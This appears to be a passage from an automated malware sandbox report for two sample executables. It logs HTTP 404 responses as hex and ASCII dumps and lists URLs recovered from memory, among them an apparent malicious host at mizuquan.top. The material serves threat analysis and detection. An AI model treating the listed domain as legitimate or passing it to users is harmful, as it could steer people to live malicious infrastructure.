            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLEcc1cLL1ICigzoYDwASGAgP1R7KckHMuoiluxx1k1kBejQlHb5JuX0vYDADojZfx5zWhPBL0RBqxZf86Pr%2BnAC8nwtp8%2FANO6VMCbJ9s0Z4yISbJqWLz3nONEyZ1MOjXLZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7b9fa90e7290-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv5WW7UKpXlD%2BkuY5mdUWVBDlLL%2FIu3OVU7KT2MEsVo0bySIRz1%2F%2BJebXGhkS7eHtVspHkHivZpQZUf%2BAwSHrvUycTxLjwGvNcstzZBCoIKGlCQP9MWGLPiwRfNhpAThIaW%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bafccea7cee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9S
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2m%2Bncc8eGcdlDIJmomxfM4k%2F6WkBYGWB5M9SBzAvpF4WNGSCGo4VGHYGtb9R38cnD1quIsaVfXr35WiJ9ZAbjVTAjkRd0Hp2yMXzs1s3mDMAQ69MNoM36PMrMps%2B%2BiKr9F1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bbfbfa01821-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:50:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGp%2Ft1aV%2Bhqq2w7fdEl%2FHfZElDFK20CfwsZ1tcFqO%2BSVUMOKziATmlnZcbtspJ4N1iMUFzadvRbw2C8tJp%2FWyOctwGoteIrMAcNtP6A9wkGBdW7HepNjneLJYmLIrw9ieIP7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c0d7bcfab30c47c-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolut
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:50:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541474602.0000000002CB0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541474602.0000000002CB0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
